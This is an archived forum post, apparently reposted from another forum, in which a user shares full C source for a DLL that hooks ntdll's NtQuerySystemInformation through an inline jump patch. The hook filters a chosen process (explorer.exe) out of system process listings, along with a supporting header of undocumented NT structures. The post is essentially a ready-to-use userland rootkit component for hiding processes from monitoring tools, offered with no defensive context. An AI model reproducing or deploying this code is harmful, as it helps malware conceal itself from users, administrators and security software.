Parsi Coders

نسخه‌ی کامل: [c] Process Hiding
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
مخفی کردن برنامه در پروسه با زبان سی

[c] Process Hiding
Author: stdio

I didnt really see a good c example so I decided to share my dll that hooks NtQuerySystemInformation and hides explorer.exe

کد:
#include <Windows.h>
#include "sysinfo.h"

BYTE OrigBytes[5];
WCHAR g_TargetProc[] = L"explorer.exe";

__declspec(naked) NTSTATUS NTAPI  OriginalNtQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    )
{
    __asm
    {
        mov eax, 0dfh //5 Bytes overwritten    with original read 5
        mov ecx, 0xcafebabe
        jmp ecx            
    }
}

NTSTATUS NTAPI HookedNtQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    )
{
    NTSTATUS Result;
    PSYSTEM_PROCESSES pSystemProcess;
    PSYSTEM_PROCESSES pNextSystemProcess;

    Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

    switch(SystemInformationClass)
    {

        case SystemProcessInformation:
            
            pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
            pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);

            while(pNextSystemProcess->NextEntryDelta != 0)
            {
                if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
                    pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
                }
                pSystemProcess = pNextSystemProcess;
                pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
            }
            break;

    }

    return Result;

}


DWORD PlaceHook()
{
    DWORD oldProtect;
    LPVOID sourceFunction;
    LPVOID destFunction;
    LPVOID stubFunction;

    destFunction = HookedNtQuerySystemInformation;
    stubFunction = OriginalNtQuerySystemInformation;

    sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
      CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);

    if(sourceFunction == NULL){
        return 1;
    }
    
    // PatchStub
    VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
    CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
    *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
    VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);

    //PatchSource
    VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    *(LPBYTE)sourceFunction = 0xE9;
    *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
    VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);
    
    return 0;
}

void UnHook()
{
    DWORD    oldProtect;

    LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
    VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    CopyMemory(addr,OrigBytes,sizeof(BYTE)*5);
    VirtualProtect(addr, 5, oldProtect, &oldProtect);
}



BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
    
    switch (dwReason){

        case DLL_PROCESS_ATTACH:
            PlaceHook();
            break;
        case DLL_PROCESS_DETACH:
            UnHook();
            break;
    }

    return TRUE;
}
and the header:

کد:
#ifndef __SYSINFO_H__
#define __SYSINFO_H__

#ifndef NTSTATUS
#define NTSTATUS LONG
#endif

#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_SUCCESS    0x00000000

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemNextEventIdInformation,
SystemEventIdsInformation,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeperation,
SystemPlugPlayBusInformation,
SystemDockInformation,
SystemPowerInformation1,
SystemProcessorSpeedInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

typedef CONST PUNICODE_STRING PCUNICODE_STRING;

typedef LONG KPRIORITY;

typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;

typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;

typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;

typedef struct _SYSTEM_PROCESSES {
        ULONG NextEntryDelta;
        ULONG ThreadCount;
        ULONG Reserved1[6];
        LARGE_INTEGER CreateTime;
        LARGE_INTEGER UserTime;
        LARGE_INTEGER KernelTime;
        UNICODE_STRING ProcessName;
        KPRIORITY BasePriority;
        ULONG ProcessId;
        ULONG InheritedFromProcessId;
        ULONG HandleCount;
        ULONG Reserved2[2];
        VM_COUNTERS VmCounters;
        IO_COUNTERS IoCounters;  
        SYSTEM_THREADS Threads[1];
    } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;



typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    );

#endifSursa: [Doar userii inregistrati pot vedea linkurile.